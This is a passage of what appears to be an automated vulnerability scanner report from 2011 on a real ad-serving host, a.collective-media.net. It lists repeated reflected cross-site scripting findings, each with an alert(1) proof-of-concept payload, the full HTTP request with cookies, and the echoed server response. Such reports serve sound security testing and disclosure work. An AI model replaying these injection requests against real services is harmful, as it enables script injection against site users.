The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b96b5'-alert(1)-'dbe3de5200 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.journalreg.midtownpress/btfaudience?b96b5'-alert(1)-'dbe3de5200=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience?b96b5'-alert(1)-'dbe3de5200=1;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.14. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40d6b'-alert(1)-'073183befc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.revinet.nyron40d6b'-alert(1)-'073183befc9/audience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 437
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.nyron40d6b'-alert(1)-'073183befc9/audience;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.15. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.nyron/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 445f7'-alert(1)-'fb62d8c0d1c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.revinet.nyron/audience445f7'-alert(1)-'fb62d8c0d1c HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 437
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:04 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:04 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience445f7'-alert(1)-'fb62d8c0d1c;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.16. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.nyron/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5db39'-alert(1)-'00226cc3b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.revinet.nyron/audience?5db39'-alert(1)-'00226cc3b3a=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 440
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience?5db39'-alert(1)-'00226cc3b3a=1;net=iblocal;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.17. http://a.collective-media.net/adj/iblocal.revinet.nyron/audience [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.nyron/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59f4c'-alert(1)-'f0c582034ee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/iblocal.revinet.nyron/audience;sz=728x90;ord=59f4c'-alert(1)-'f0c582034ee HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience;sz=728x90;net=iblocal;ord=59f4c'-alert(1)-'f0c582034ee;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.18. http://a.collective-media.net/adj/q1.sarasota/be_life [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.sarasota/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dfe0'-alert(1)-'42836f7dacf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.sarasota7dfe0'-alert(1)-'42836f7dacf/be_life HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:09 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:09 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sarasota7dfe0'-alert(1)-'42836f7dacf/be_life;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.19. http://a.collective-media.net/adj/q1.sarasota/be_life [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.sarasota/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b8b7'-alert(1)-'3f7e7a62971 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.sarasota/be_life5b8b7'-alert(1)-'3f7e7a62971 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 421
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:09 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:09 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sarasota/be_life5b8b7'-alert(1)-'3f7e7a62971;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.20. http://a.collective-media.net/adj/q1.sarasota/be_life [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.sarasota/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cc4a'-alert(1)-'37148d3a555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.sarasota/be_life?2cc4a'-alert(1)-'37148d3a555=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 424
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:07 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:07 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sarasota/be_life?2cc4a'-alert(1)-'37148d3a555=1;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.21. http://a.collective-media.net/adj/q1.wgn/be_ros [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 509cc'-alert(1)-'dd15475be8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.wgn509cc'-alert(1)-'dd15475be8c/be_ros HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 415
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.wgn509cc'-alert(1)-'dd15475be8c/be_ros;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.22. http://a.collective-media.net/adj/q1.wgn/be_ros [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 131f9'-alert(1)-'4d242a9ee99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.wgn/be_ros131f9'-alert(1)-'4d242a9ee99 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 415
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.wgn/be_ros131f9'-alert(1)-'4d242a9ee99;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.23. http://a.collective-media.net/adj/q1.wgn/be_ros [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.wgn/be_ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae963'-alert(1)-'4b4c645e430 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.wgn/be_ros?ae963'-alert(1)-'4b4c645e430=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 418
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:13:01 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:13:01 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.wgn/be_ros?ae963'-alert(1)-'4b4c645e430=1;net=q1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.24. http://a.collective-media.net/adj/q1.wgn/be_ros [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.wgn/be_ros

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc565'-alert(1)-'8b9db52da50 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /adj/q1.wgn/be_ros;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9b/3/0/%2a/d%3B211497745%3B0-0%3B2%3B36414418%3B3454-728/90%3B30079181/30097058/1%3Bu%3Dhttp%3A//www.wgntv.com/business/sns-ap-us-obit-daniel-bell%2C0%2C4200211.story%3B%7Eokv%3D%3B%3Bptype%3Dsbrd%3Bslug%3Dsns-ap-us-obit-daniel-bell%3Bpos%3DTbrd%3Bdcopt%3Dist%3Bsz%3D728x90%3Btile%3D1%3Bca%3DPolitics%3Ben%3DNewYork%3Bat%3DPolitics%3Bat%3DPhilosophy%3Bat%3DArtsandCulture%3Bat%3DCulture%3Bat%3DSociety%3Bu%3Dhttp%3A//www.wgntv.com/business/sns-ap-us-obit-daniel-bell%2C0%2C4200211.story%3B%7Eaopt%3D2/0/9c06/0%3B%7Esscs%3D%3f;ord=4273326?\dc565'-alert(1)-'8b9db52da50 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 22:12:59 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 25-Feb-2011 22:12:59 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.wgn/be_ros;sz=728x90;net=q1;ord=4273326?\dc565'-alert(1)-'8b9db52da50;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">

1.25. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1ed'-alert(1)-'96e41b994b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj5d1ed'-alert(1)-'96e41b994b4/iblocal.journalreg.midtownpress/atfaudience;sz=728x90;net=iblocal;ord=3170523067; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:24 GMT
Content-Length: 7392
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-23467852_1296080004","http://ad.doubleclick.net/adj5d1ed'-alert(1)-'96e41b994b4/iblocal.journalreg.midtownpress/atfaudience;net=iblocal;u=,iblocal-23467852_1296080004,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_

1.26. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba7a5'-alert(1)-'4f52b008f6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpressba7a5'-alert(1)-'4f52b008f6d/atfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:22 GMT
Content-Length: 7340
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-68448431_1296080002","http://ad.doubleclick.net//iblocal.journalreg.midtownpressba7a5'-alert(1)-'4f52b008f6d/atfaudience;net=iblocal;u=,iblocal-68448431_1296080002,11d765b6a10b1b3,none,ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=ex.32;btg

1.27. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43cf1'-alert(1)-'7340f06b2aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/atfaudience43cf1'-alert(1)-'7340f06b2aa HTTP/1.1
